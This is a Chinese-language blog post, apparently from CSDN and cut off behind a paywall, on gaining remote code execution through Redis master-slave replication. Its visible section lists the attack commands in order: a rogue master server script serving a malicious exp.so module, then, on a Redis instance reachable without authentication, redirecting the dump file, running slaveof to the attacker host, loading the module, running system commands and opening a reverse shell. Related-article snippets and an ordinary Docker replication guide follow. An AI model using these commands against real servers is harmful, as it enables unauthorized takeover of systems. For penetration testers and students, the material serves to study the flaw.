redis主从复制

最新推荐文章于 2024-09-26 08:15:00 发布
最新推荐文章于 2024-09-26 08:15:00 发布
阅读量359 收藏
点赞数
分类专栏: 书籍工具资料收集 文章标签: 安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hacker_zrq/article/details/139132017
版权
本文探讨了Redis主从复制过程中可能存在的RCE风险。首先详细记录了手动触发主从复制RCE的步骤,包括编写脚本构造恶意Redis服务器并监听本地端口。接着,介绍了如何通过主从复制实现反弹shell,提到了利用SSRF漏洞代码,通过dict和gopher协议成功获取shell的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、主从复制RCE

手动操作过程记录:

1、编写脚本,构造恶意Redis服务器,监听本地端口1234,加载exp.so。

python RogueServer.py --lport 1234 --exp exp.so

2、通过未授权访问连入要攻击的redis服务器。

执行相关命令:

#设置redis的备份路径为当前目录
    config set dir ./
#设置备份文件名为exp.so,默认为dump.rdb
    config set dbfilename exp.so
#设置主服务器IP和端口
    slaveof 192.168.172.129 1234  
#加载恶意模块
    module load ./exp.so
#切断主从,关闭复制功能
    slaveof no one 
#执行系统命令
    system.exec 'whoami'
    system.rev 127.0.0.1 9999    
#通过dump.rdb文件恢复数据
    config set dbfilename dump
了解本专栏 订阅专栏 解锁全文
Redis-主从复制
shui2104的博客
09-27 308
Redis-主从复制 ​ 为了避免单点Redis服务器故障,准备多台服务器,相互连通。将数据多个副本保存在不同的服务器上,连接在一起,并保证数据是同步的。即使其中某一台服务器宕机,其他服务器依然可以继续提供服务,实现Redis的高可用,同时实现数据冗余备份。 ​ 主从复制即将master中的数据有效及时的复制到slave中。一个master可以对应多个slave,一个slave只能对应一个master。 master:复制写数据,执行写操作时,将出现变化的数据自动同步到slave。读数据的操作基本可忽略
Redis主从复制RCE(4.x、5.x)
qq_57163799的博客
08-20 633
Redis未授权访问之主从复制RCE(利用简单快速)!!!
Redis主从复制实现RCE
rev1ve的博客
12-01 3893
主从复制是指将一台Redis主服务器的数据,复制到其他的Redis从服务器。前者称为主节点(master),后者称为从节点(slave);主服务器可以进行读写操作,当发生写操作时自动将写操作同步给从服务器,而从服务器一般是只读,并接受主服务器同步过来写操作命令,然后执行这条命令。 也就是说,所有的数据修改只在主服务器上进行,然后将最新的数据同步给从服务器,这样就使得主从服务器的数据是一致的。建立主从复制,有3种方式:PS:建立主从关系只需要在从节点操作就行了,主节点不用任何操作我们先在同一个机器开两个red
Redis基于主从复制的RCE
m0_58596609的博客
10-13 2666
Redis基于主从复制的RCE
redis主从复制_Redis 基于主从复制的 RCE 利用方式
weixin_39638057的博客
11-19 380
作者:LoRexxar'@知道创宇404实验室时间:2019年7月9日在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式[1],比起以前的利用方式来说,这种利用方式更为通用,危害也更大,下面就让我们从以前的redis RCE利用方式出发,一起聊聊关于redis的利用问题。1. 通过...
Redis主从复制问题和扩容问题的解决思路
01-19
为了解决Redis主从Copy的问题,有如下两个解决方案: 主动复制所谓主动复制,就是业务层双写多个Redis,避开Redis自带的主从复制。但是自己干同步,就会产生一致性问题,为了保证主从一致,需要加入一系列的验证机制...
第02篇:Redis主从复制getshell1
08-03
1、生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 1、监听本地1234端口 2、将Redis服务器设置
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
Redis主从复制以及主从复制技术原理.docx
10-14
Redis 主从复制技术原理 概述 Redis 是一个开源的使用 ANSI C 语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的 API。Redis 主从复制是指将一台 Redis 服务器的数据,复制到...
Redis主从复制和集群配置
08-21
### Redis主从复制和集群配置详解 #### 一、Redis主从复制原理及配置 **1.1 概述** Redis主从复制机制是一种重要的数据同步方式,它支持一个或多个从数据库(slave)与主数据库(master)之间进行数据同步。其中,...
windows下redis主从复制部署
liuxiaohui1的博客
05-12 278
1、windows下主从复制redis 2、修改端口号 port 6380 配置主从服务 slaveof 127.0.0.1 6379 3、报错:D:\ProgramFiles\redis>redis-server.exe --service-install redis.windows.conf --loglevel verbose [12820] 06 Sep 11:00:26.431 # HandleServiceCommands: system error caught. error cod
Redis 4.x5.x 未授权访问漏洞(Redis基于主从复制的RCE)
黑白的博客
12-06 2221
声明 好好学习,天天向上 漏洞描述 SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 影响范围 SaltStack < 2019.2.4 SaltStack &l
Redis进行RCE利用总结
weixin_50464560的博客
11-07 2643
百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。连接到redis,输入以下指令利用crontab反弹shell。Redis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务,且已知工作目录为。kali中打开一个新的命令行窗口执行。
漏洞复现之Redis-rce
weixin_30300225的博客
07-11 383
通过主从复制 GetShell  Redis主从复制   Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机...
Redis总结四(主从复制 击穿等)
qq_52840805的博客
07-31 239
Redis缓存穿透、击穿和雪崩 缓存穿透-查不到 概念:用户需要查询一个数据,发现Redis中没有,也就是缓存没有命中,于是就向持久层数据库发起查询,发现也没有这个数据,于是本次查询失败 当用户很多的情况,缓存没有命中,又回去请求数据库,这就会给数据库造成很大的压力,这个就是缓存穿透 解决方案-1 布隆过滤器 布隆过滤器是一种算法,是用户检测一个元素是否在一个集合中,存在一定的误差 可以将所有可能查询的参数以hash形式来进行存储,在控制层进行校验,不符合的则丢弃,从而避免对数据库的查询压力 解决方案
Redis主从复制
m0_74166099的博客
09-26 713
接下来继续介绍Redis中的主从复制~在分布式系统中,涉及到一个和关键的问题:单点问题。引入分布式系统也是为了解决上述的单点问题!
Redis未授权四种利用方式与修复方案
qq_45234543的博客
11-08 5826
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
redis主从rce和redis5.0版本下rce的不同
五分之一世纪
08-08 586
文章目录(1)redis遵循的两种脚本协议【1】明文(plaintext)【2】序列化(custom)【3】分析(2)实现rce的方法【1】不持久的RCE【2】一般情况下的持久的RCE【3】5.0版本下持久的RCE 学习redis主从漏洞你一定要知道的知识点 (1)redis遵循的两种脚本协议 【1】明文(plaintext) example: SET keyname value\n 【2】序列化(custom) example: *3\r\n$3\r\nSET\r\n$7\r\nkeyname\r\n$5
Redis主从复制
最新发布
03-10
### Redis主从复制配置方法 #### Docker环境下的Redis主从复制设置 为了在Docker环境中成功配置Redis主从复制,需先理解基本概念以及具体的操作流程。 #### 基本概念解释 主从复制意味着将一台Redis服务器的数据同步至其他Redis实例。此过程涉及两个角色:一个是作为数据源的主节点(master),另一个是从主节点接收更新副本的从节点(slave)。这种架构允许读取负载均衡,并提供了一定程度上的冗余保障[^2]。 #### 创建网络连接以便容器间通信 确保所有参与复制的Redis服务能够相互通信至关重要。为此,建议创建专用的Docker网络来促进这些交互: ```bash docker network create redis-network ``` #### 启动主服务器 启动一个名为`redis-master`的服务端口映射到主机6379端口上,并将其加入之前建立好的自定义网络中去: ```bash docker run -d --name redis-master -p 6379:6379 --network redis-network redis ``` 这一步骤建立了整个集群的核心——即存储实际键值对的地方[^3]。 #### 修改配置文件支持远程访问 为了让后续添加的从机可以正常连通主机,需要调整默认不允许外部链接的安全策略。可以通过编辑已有的配置文件或者挂载新的配置文件方式完成这项工作。这里给出一种基于后者的方法示例: ```bash vim /home/docker/redis6379/conf/redis.conf ``` 在此文件内部找到有关绑定地址的部分(`bind`)取消其注释状态并将值设为空白表示接受来自任何地方请求;另外还需开启认证机制以增强安全性(如果适用的话)[^4]。 #### 添加并初始化第一个从属节点 现在准备就绪向系统引入首个辅助成员了。执行如下指令部署新实例同时指定它所依赖的目标对象名称为先前提到过的那个“master”。 ```bash docker run -d --name redis-slave1 --link redis-master:master \ --network redis-network \ -e REDIS_MASTER_HOST=master \ -e REDIS_MASTER_PORT=6379 \ -p 6380:6379 \ redis redis-server --slaveof master 6379 ``` 上述命令不仅完成了容器本身的创建工作还指定了必要的环境变量用于告知子进程应当追随哪台机器成为自己的上级领导单位。 #### 扩展更多跟随者 如果有需求进一步扩大规模只需重复上面的过程更改相应参数比如暴露不同对外监听接口即可轻松达成目的。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ad_m1n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值